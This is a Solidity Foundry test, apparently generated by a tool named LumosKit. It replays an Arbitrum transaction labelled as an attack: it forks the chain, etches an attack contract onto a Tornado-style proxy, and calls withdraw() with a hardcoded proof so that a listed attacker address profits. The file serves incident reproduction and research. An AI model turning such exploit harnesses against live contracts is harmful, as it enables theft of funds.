// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;

import {Test, console2} from "forge-std/Test.sol";
import {LumosPoCBase} from "./LumosPoCBase.sol";

// @KeyInfo - Total Lost : N/A
// Attacker : 0x0a5b2bf3ccfb44c1d22f07eed9553ecba752d4ad
// Attack Contract : 0x0d5550d52428e7e3175bfc9550207e4ad3859b17
// Vulnerable Contract : 0x0d5550d52428e7e3175bfc9550207e4ad3859b17
// Attack Tx : 0x445b7204e7f12bf6b005847daed813783dd22f70a9af7a1e8bf172a7279a2555
// Block : 450305694
// Chain : Arbitrum
// Analysis :
//
// @Reproduction
// Verdict : pass
// Economic Proof : attacker_profit_reproduction
// Reproduced Value : 0.31 USD
//
// @POC Author
// Generated by LumosKit

contract AttackTest is LumosPoCBase {
    address constant ATTACKER_EOA = LumosAddresses.attacker_eoa;
    address constant ATTACK_CONTRACT = LumosAddresses.TornadoProxyLight;
    uint256 constant FORK_BLOCK = 450305693;
    uint256 constant TX_TIMESTAMP = 1775644206;
    uint256 constant TX_BLOCK_NUMBER = 450305694;
    uint256 constant TX_VALUE = 0;



    function setUp() public {
        vm.createSelectFork(vm.envString("LUMOSKIT_FORK_ENDPOINT"), FORK_BLOCK);
        if (TX_TIMESTAMP != 0) vm.warp(TX_TIMESTAMP);
        if (TX_BLOCK_NUMBER != 0) vm.roll(TX_BLOCK_NUMBER);
    }

    function testPoC() public {
        _runExploit();
    }

    function _runExploit() internal {
        _fundCaller();
        vm.startPrank(ATTACKER_EOA, ATTACKER_EOA);
        OurAttack attack;
        if (ATTACK_CONTRACT != address(0)) {
            _installAttackRuntime();
            attack = OurAttack(payable(ATTACK_CONTRACT));
        } else {
            attack = new OurAttack();
        }
        _expectOutcome(address(attack), address(0));
        _snapProfit();
        _logBalances("Before exploit");
        attack.attack{value: TX_VALUE}();
        _logBalances("After exploit");
        vm.stopPrank();
        _assertProfit();
    }

    function _fundCaller() internal {
        if (TX_VALUE == 0) return;
        vm.deal(ATTACKER_EOA, TX_VALUE);
        vm.deal(address(this), TX_VALUE);
    }

    function _installAttackRuntime() internal {
        vm.etch(ATTACK_CONTRACT, type(OurAttack).runtimeCode);
    }

    function _expectOutcome(address attack, address helper) internal {
        attack; helper;
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.ZERO, "ETH", 129160100000000);
        _expectProfit(LumosAddresses.A_405920_4279, address(0), LumosAddresses.ZERO, "ETH", 99863897780000000);
    }

}

contract OurAttack {
    // Pseudocode-backed attacker surfaces used to guide readable synthesis.
    // If these lines do not become executable calls below, the missing layer is semantic/lift action structuring, not a replay fallback.
    // - role=attacker_entry selector=0xb438689f selector_label=withdraw(address,bytes,bytes32,bytes32,address,address,uint256,uint256) lift_statements=85 pseudocode_path=pseudocode/functions/function_0000.md

    function attack() external payable {
        _executeWithdraw();
    }

    function _executeWithdraw() internal {
        {
            bytes memory withdrawProof = hex"14e6837c5d0d8e2209ca7973559544f98f050e9a41034e88bedf114bc54492b4164de1479caeb81bea3131065aa6236b923778a11efe5e9bc24d6535260d03fd250fbe42ba124c9d2d95f939dd2d02781b6be8f9f2518adf294265fb9da7c394259099222dcc01b552de1e131fad744cbf7e0ca13980fe88764f75c90bd204e827b5c1fc5ec1b2bd8923eaf9c66b1a368e9933adcb9173fff4cd4b6e59a8608f2d5e65c9413c5575b0a382c72acfda8d21b89d89aa31cb4820c3f531eda9b1e0210977171d154331f3261175097a230255abb060c4e0448478b528ac88696fe12ff6b9f26c67ef0409da5b05d96c07d588e52208872b022efbaddc0036358684";
            IContract_84443C_3A1F(LumosAddresses.A_84443C_3A1F).withdraw(withdrawProof, bytes32(hex"2d50988585493fa0ecc1d36f0a3ce50aba74c452d47ca39a9933ae83629c9023"), bytes32(hex"0f63f0157f861307e2f5b9de20d44582c15e2ae567e7b947d047e081f495d351"), LumosAddresses.A_405920_4279, LumosAddresses.attacker_eoa, 136102220000000, 0);
        
        }
    }

    receive() external payable {
    }

    fallback() external payable {
        if (msg.sig == 0xb438689f) { _executeWithdraw(); return; }
        _handleEntryCallback();
    }

    function _handleEntryCallback() internal {
    }


}

interface IERC20Like {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external;
    function transfer(address to, uint256 amount) external;
    function transferFrom(address from, address to, uint256 amount) external;
}

interface IERC721Like {
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

interface IMulticallLike {
    function multicall(bytes[] calldata data) external returns (bytes[] memory results);
}

struct LumosObservedCall {
    address target;
    bytes data;
}

library LumosAddresses {
    address internal constant ZERO = address(0);
    address internal constant attacker_eoa = 0x0A5B2bF3cCfB44C1D22F07Eed9553eCba752D4aD; // LumosAddresses.attacker_eoa = 0x0a5b2bf3ccfb44c1d22f07eed9553ecba752d4ad label=attacker_eoa roles=attacker_eoa|contract|economic_holder|observed_address|profit_holder|recipient|sender source=tx_metadata.from confidence=high
    address internal constant TornadoProxyLight = 0x0D5550d52428E7e3175bfc9550207e4ad3859b17; // address(this) = 0x0d5550d52428e7e3175bfc9550207e4ad3859b17 label=TornadoProxyLight roles=attacker_contract|attacker_entry_contract|code_contract|contract|localized_contract|observed_address|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant A_405920_4279 = 0x40592025392BD7d7463711c6E82Ed34241B64279; // LumosAddresses.A_405920_4279 = 0x40592025392bd7d7463711c6e82ed34241b64279 label=0x40592025392bd7d7463711c6e82ed34241b64279 roles=contract|economic_holder|observed_address|profit_holder|recipient source=asset_delta.profit_candidates confidence=medium
    address internal constant A_84443C_3A1F = 0x84443CFd09A48AF6eF360C6976C5392aC5023a1F; // LumosAddresses.A_84443C_3A1F = 0x84443cfd09a48af6ef360c6976c5392ac5023a1f label=unresolved roles=asset|contract|observed_address|recipient|storage_contract source=unresolved confidence=low
    address internal constant BalancerVault = 0xBA12222222228d8Ba445958a75a0704d566BF2C8; // LumosAddresses.BalancerVault = 0xba12222222228d8ba445958a75a0704d566bf2c8 label=BalancerVault roles=known_protocol source=poc_sketch.known_addresses confidence=high
    address internal constant A_FFFFFF_FFFF = 0xFFfFfFffFFfffFFfFFfFFFFFffFFFffffFfFFFfF; // LumosAddresses.A_FFFFFF_FFFF = 0xffffffffffffffffffffffffffffffffffffffff label=unresolved roles=observed_address source=unresolved confidence=low
}

interface IContract_84443C_3A1F {
    function withdraw(bytes calldata, bytes32, bytes32, address, address, uint256, uint256) external;
}

